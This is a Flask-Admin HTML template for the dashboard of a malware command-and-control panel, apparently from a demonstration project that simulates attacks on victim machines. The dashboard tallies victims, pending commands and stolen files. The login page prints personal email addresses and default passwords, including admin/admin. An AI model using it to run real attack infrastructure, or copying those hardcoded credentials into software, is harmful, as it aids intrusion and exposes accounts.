{% extends 'admin/master.html' %}
{% block body %}
{{ super() }}

{% if current_user.is_authenticated %}

<!-- Content Header (Page header) -->
<section class="content-header">
  <h1>
    Dashboard
    <small>Control panel</small>
  </h1>
  <ol class="breadcrumb">
    <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li>
    <li class="active">Dashboard</li>
  </ol>
</section>

<section class="content">
  <!-- Small boxes (Stat box) -->
  <div class="row">
    <div class="col-lg-3 col-xs-6">
      <!-- small box -->
      <div class="small-box bg-aqua">
        <div class="inner">
          <h3>150</h3>
          <p>Victims</p>
        </div>
        <div class="icon">
          <i class="ion ion-stats-bars"></i>
        </div>
        <a href="victim/" class="small-box-footer">More info <i class="fa fa-arrow-circle-right"></i></a>
      </div>
    </div>
    <!-- ./col -->
    <div class="col-lg-3 col-xs-6">
      <!-- small box -->
      <div class="small-box bg-green">
        <div class="inner">
          <h3>53<sup style="font-size: 20px"></sup></h3>

          <p>Active commands requests</p>
        </div>
        <div class="icon">
          <i class="ion ion-stats-bars"></i>
        </div>
        <a href="commandrequest/" class="small-box-footer">More info <i class="fa fa-arrow-circle-right"></i></a>
      </div>
    </div>
    <!-- ./col -->
    <div class="col-lg-3 col-xs-6">
      <!-- small box -->
      <div class="small-box bg-yellow">
        <div class="inner">
          <h3>44</h3>

          <p>Stolen files</p>
        </div>
        <div class="icon">
          <i class="ion ion-stats-bars"></i>
        </div>
        <a href="file/" class="small-box-footer">More info <i class="fa fa-arrow-circle-right"></i></a>
      </div>
    </div>
    <!-- ./col -->
    <div class="col-lg-3 col-xs-6">
      <!-- small box -->
    </div>
    <!-- ./col -->
  </div>

</section>
<!-- /.content -->
{% else %}

<center>
  <section class="content" style="color: white">
    <div class="col-sm-12">
      <h1>Command and control for attackers</h1>
{#      <p class="lead">#}
{#        Authentication#}
{#      </p>#}
      <p>
{#        The project simulates a complex malware attack on a victim’s computer and demonstrates the risks lying in malware that arrives on a personal or organizational computer. <br> The project demonstrates malicious actions that can be executed on the victim machine while bypassing security features in different OS (Windows and Linux) and avoiding detection by modern security products.The core userland process (Malware agent) is written in GO while the driver (kernel component in the malware) is written mainly in C.#}
          The project simulates a complex malware attack on a victim’s computer and demonstrates the risks lying in malware that arrives on a personal or organizational computer. <br> <br> <br>
      </p>
      {% if not current_user.is_authenticated %}
      <p>You can register as a regular user: <br><br>
          email: <b>naum.raviz@gmail.com</b> <br>
          password: <b>123456</b> <br>

          email: <b>omer.tsarfati@gmail.com</b> <br>
          password: <b>123456</b> <br> <br>

          Or log in as a superuser with the following credentials: <br><br>

        email: <b>admin</b> <br>
        password: <b>admin</b> <br>
        <br>
      <p>
        <a class="btn btn-primary" href="{{ url_for('security.login') }}">Login</a> <a class="btn btn-default" href="{{ url_for('security.register') }}">Register</a>
      </p>
      {% endif %}
      <br>
{#      <p>#}
{#        <a class="btn btn-primary" href="/"><i class="glyphicon glyphicon-chevron-left"></i> Back</a>#}
{#      </p>#}
    </div>
  </section>
</center>

{% endif %}

{% endblock body %}